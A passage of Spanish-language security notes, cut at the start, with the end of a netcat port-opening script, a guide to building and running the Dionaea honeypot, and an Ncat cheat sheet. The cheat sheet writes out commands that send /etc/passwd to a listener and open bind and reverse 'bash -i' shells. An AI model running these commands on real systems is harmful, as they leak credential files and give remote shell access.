#  echo -n "$port, "
  nc $udp -p $port $ip $port 2> /dev/null &
  let "counter += 1"
 fi
done
killall nc 2> /dev/null

local# ./opa 79.159.199.15 1 65535

# Instalar dionaea

Información

Dionaea

Instalación

# cat /etc/lsb-release | grep DESC
DISTRIB_DESCRIPTION="Ubuntu 10.10"
# cd
# ### Some packages
# apt-get install libudns-dev \
libglib2.0-dev \
libssl-dev \
libcurl4-openssl-dev \
libreadline-dev \
libsqlite3-dev \
python-dev \
libtool \
automake \
autoconf \
build-essential \
subversion \
git-core \
flex \
bison \
pkg-config
# mkdir /opt/dionaea
# mkdir dionaea
# cd dionaea
# ### liblcfg
# git clone git://git.carnivore.it/liblcfg.git liblcfg
# cd liblcfg/code
# autoreconf -vi
# ./configure --prefix=/opt/dionaea
# make install
# cd ..
# cd ..
# ### libemu
# git clone git://git.carnivore.it/libemu.git libemu
# cd libemu
# autoreconf -vi
# ./configure --prefix=/opt/dionaea
# make install
# cd ..
# ### libev
# wget http://dist.schmorp.de/libev/Attic/libev-3.9.tar.gz
# tar xfz libev-3.9.tar.gz
# cd libev-3.9
# ./configure --prefix=/opt/dionaea
# make install
# cd ..
# ### cython
# wget http://cython.org/release/Cython-0.12.1.tar.gz
# tar xfz Cython-0.12.1.tar.gz
# cd Cython-0.12.1       
# python setup.py build
# sudo python setup.py install
# cd ..
# ### sqlite3
# apt-get install sqlite3
# ### python3
# wget http://python.org/ftp/python/3.1.2/Python-3.1.2.tgz
# tar xfz Python-3.1.2.tgz
# cd Python-3.1.2
# ./configure --enable-shared \
--prefix=/opt/dionaea \
--with-computed-gotos \
--enable-ipv6 \
LDFLAGS="-Wl,-rpath=/opt/dionaea/lib/"
# make
# make install
# cd ..
# ### libxml2
# apt-get install libxml2-dev
# ### libxslt
# apt-get install libxslt1-dev
# ### lxml
# wget http://codespeak.net/lxml/lxml-2.2.6.tgz
# tar xfz lxml-2.2.6.tgz
# cd lxml-2.2.6
# /opt/dionaea/bin/2to3 -w src/lxml/html/_diffcommand.py
# /opt/dionaea/bin/2to3 -w src/lxml/html/_html5builder.py
# /opt/dionaea/bin/python3 setup.py build
# /opt/dionaea/bin/python3 setup.py install
# cd ..
# ### c-ares
# wget http://c-ares.haxx.se/c-ares-1.7.3.tar.gz
# tar xfz c-ares-1.7.3.tar.gz
# cd c-ares-1.7.3
# ./configure --prefix=/opt/dionaea
# make
# make install
# cd ..
# ### curl
# wget http://curl.haxx.se/download/curl-7.20.0.tar.bz2
# tar xfj curl-7.20.0.tar.bz2
# cd curl-7.20.0
# ./configure --prefix=/opt/dionaea --enable-ares=/opt/dionaea
# make
# make install
# cd ..
# ### libpcap
# wget http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
# tar xfz libpcap-1.1.1.tar.gz
# cd libpcap-1.1.1
# ./configure --prefix=/opt/dionaea
# make
# make install
# cd ..
# ### p0f
# apt-get install p0f
# ### dionaea
# git clone git://git.carnivore.it/dionaea.git dionaea
# cd dionaea
# autoreconf -vi
# ./configure --with-lcfg-include=/opt/dionaea/include/ \
--with-lcfg-lib=/opt/dionaea/lib/ \
--with-python=/opt/dionaea/bin/python3.1 \
--with-cython-dir=/usr/local/bin \
--with-udns-include=/opt/dionaea/include/ \
--with-udns-lib=/opt/dionaea/lib/ \
--with-emu-include=/opt/dionaea/include/ \
--with-emu-lib=/opt/dionaea/lib/ \
--with-gc-include=/usr/include/gc \
--with-ev-include=/opt/dionaea/include \
--with-ev-lib=/opt/dionaea/lib \
--with-nl-include=/opt/dionaea/include \
--with-nl-lib=/opt/dionaea/lib/ \
--with-curl-config=/opt/dionaea/bin/ \
--with-pcap-include=/opt/dionaea/include \
--with-pcap-lib=/opt/dionaea/lib/ \
--with-glib=/opt/dionaea
# make
# make install
# cd ..

Configuración

# cd /opt/dionaea/etc/dionaea
# sed -i 's/^\/\/\t\t\t"p0f"/\t\t\t"p0f"/' dionaea.conf

Ejecución

# cd /opt/dionaea/bin/
# p0f -i any -u root -Q /tmp/p0f.sock -q -l -d -o /tmp/p0f.log
# ./dionaea -l all,-debug -L '*' -D

Visualización

# cd /opt/dionaea/var/dionaea
# sqlite3 logsql.sqlite
sqlite> select count(local_port), local_port
FROM connections
where connection_type='accept'
group by local_port;
9|135
4|445
2|1433
sqlite> .exit

# Ncat

Información

Ncat

Recibir un fichero de un equipo remoto

local# ncat -l 192.168.1.1 1234
remoto# ncat --send-only 192.168.1.1 1234 < /etc/passwd

Recibir un fichero de un equipo remoto (cifrando)

local# ncat --ssl -l 192.168.1.1 1234
remoto# ncat --ssl --send-only 192.168.1.1 1234 < /etc/passwd

Abrir una shell en un equipo remoto

remoto# ncat -l 192.168.1.2 1234 -c "bash -i 2>&1"
local# ncat 192.168.1.2 1234

Recibir una shell de un equipo remoto

local# ncat -l 192.168.1.1 1234
remoto# ncat 192.168.1.1 1234 -c "bash -i 2>&1"

Redirección de puertos con destino fijo

remoto# ncat -l 192.168.1.2 1234 -c "ncat 192.168.1.3 21"
local# ncat 192.168.1.2 1234

Redirección de puertos con destino variable (proxy)

remoto# ncat -l 192.168.1.2 1234 --proxy-type http
local# ncat --proxy 192.168.1.2:1234 192.168.1.3 21

Chat entre dos clientes con control de acceso

servidor# ncat -l 192.168.1.3 1234 --chat -m 2 --allow 192.168.1.0/24
remoto# ncat 192.168.1.3 1234
local# ncat 192.168.1.3 1234